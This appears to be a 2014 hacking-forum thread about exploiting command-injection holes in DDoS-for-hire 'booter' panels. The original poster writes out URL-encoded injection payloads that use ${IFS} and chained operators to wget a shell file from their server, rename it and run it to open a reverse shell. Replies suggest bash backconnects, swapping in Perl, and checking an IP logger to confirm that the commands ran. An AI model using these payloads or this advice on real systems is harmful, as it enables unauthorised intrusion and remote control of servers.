The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thirteen Years of Service
Posts: 529
Threads: 60
booter exploitation 09-01-2014, 05:35 PM
#1
I feel like such a noob for posting this, but I feel like I've tried everything and this is my last resort.
I've tried exploiting several booters using the vulnerability that Reiko made a thread about, and following the steps included in the thread.
I inserted commands with encoding and using ${IFS} for spaces but it doesn't seem to do anything. Example -
%26%26${IFS}wget${IFS}http://my.server.ip/shell.txt Which converts to
&& wget http://my.server.ip/shell.txt
After I tried that, I tried using ; instead of && and that had the same affect - nothing. I'm inserting the commands in the host input field on layer-7 attacks because according to Reiko, are the ones that are vulnerable to this.
•
Twelve Years of Service
Posts: 152
Threads: 11
RE: booter exploitation 09-01-2014, 05:43 PM
#2
@
Reiko might be able to help you with this
•
Twelve Years of Service
Posts: 21
Threads: 1
RE: booter exploitation 09-01-2014, 05:59 PM
#3
How do you know it doesn't do anything? Even if this command ran properly it would have ran Wget on the attack servers not the website hosting server.
Wild UMBREON appeared!
[impersonation intensifies]
•
Thirteen Years of Service
Posts: 2,721
Threads: 222
RE: booter exploitation 09-01-2014, 06:22 PM
#4
Instead of trying to spawn a web shell, try to do a backconnect that way you can know if it is doing anything as its running on the server not booter host.
•
Thirteen Years of Service
Posts: 529
Threads: 60
RE: booter exploitation 09-01-2014, 08:00 PM
#5
(09-01-2014, 05:59 PM)no__197 Wrote: How do you know it doesn't do anything? Even if this command ran properly it would have ran Wget on the attack servers not the website hosting server.
Wget isn't the only command I was running, I was just giving an example of how I was trying to run commands. Here's the commands I'm trying to do in order -
Code:
%26%26${IFS}wget${IFS}http://my.server.ip/shell.txt
%26%26${IFS}mv${IFS}shell.txt${IFS}shell.php
%26%26${IFS}php${IFS}shell.php
The second one is so that I can rename shell.txt to shell.php and the third one is so I can execute it. When it's executed, it connects back to my server and spawns a shell.
(09-01-2014, 06:22 PM)Adorapuff Wrote: Instead of trying to spawn a web shell, try to do a backconnect that way you can know if it is doing anything as its running on the server not booter host.
The PHP "shell.txt" file connects to my server and spawns a shell once it's executed.
Of course after I wget it, I rename it to shell.php then do
%26%26${IFS}php${IFS}shell.php so that it gets executed, but for some reason, I never get a connection when listening.
(This post was last modified: 09-01-2014, 08:03 PM by Crypt.)
•
Twelve Years of Service
Posts: 21
Threads: 1
RE: booter exploitation 09-01-2014, 08:13 PM
#6
(09-01-2014, 08:00 PM)Crypt Wrote: Wget isn't the only command I was running, I was just giving an example of how I was trying to run commands. Here's the commands I'm trying to do in order -
Code:
%26%26${IFS}wget${IFS}http://my.server.ip/shell.txt
%26%26${IFS}mv${IFS}shell.txt${IFS}shell.php
%26%26${IFS}php${IFS}shell.php
The second one is so that I can rename shell.txt to shell.php and the third one is so I can execute it. When it's executed, it connects back to my server and spawns a shell.
The PHP "shell.txt" file connects to my server and spawns a shell once it's executed.
Of course after I wget it, I rename it to shell.php then do %26%26${IFS}php${IFS}shell.php so that it gets executed, but for some reason, I never get a connection when listening.
Yes, but you have to keep in mind the commands you are trying to run are being ran on the attack server.
Chances are that even if your shell.php file downloaded the server won't even have PHP installed.
Try something to actually confirm your command ran, such as curl to a website you own or some IP logger and then checking the access.log to see if it visited or just a bash one-liner backconnect.
If you own the server you tried to wget the shell.txt from then check access.logs of that box to see if it connected.
Wild UMBREON appeared!
[impersonation intensifies]
•
Twelve Years of Service
Posts: 152
Threads: 11
RE: booter exploitation 09-01-2014, 08:36 PM
#7
Alright I'm tired of you spamming my skype asking how to do this
1. Use a perl script, not a php one
2. Success
•
Thirteen Years of Service
Posts: 2,721
Threads: 222
RE: booter exploitation 09-01-2014, 08:44 PM
#8
(09-01-2014, 08:36 PM)chronical Wrote: Alright I'm tired of you spamming my skype asking how to do this
1. Use a perl script, not a php one
2. Success
Are PHP scripts not supported?
•
Twelve Years of Service
Posts: 152
Threads: 11
RE: booter exploitation 09-01-2014, 11:57 PM
#9
(09-01-2014, 08:44 PM)Adorapuff Wrote: Are PHP scripts not supported?
I guess that's one way of saying it.
You see, when you execute commands through the GUI of the booter it sends those commands to the attack server. And considering the fact that it's an attack server and nothing more, there's really no need for PHP so 99% of the time, PHP isn't installed on it. Where as perl is built in on all linux machines, so it's just better to use it instead.
•
Thirteen Years of Service
Posts: 700
Threads: 19
RE: booter exploitation 09-03-2014, 04:13 AM
#10
You need to form a valid URL with your attack as well.
http://loli.dance/?test%26%26commands for example
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47
•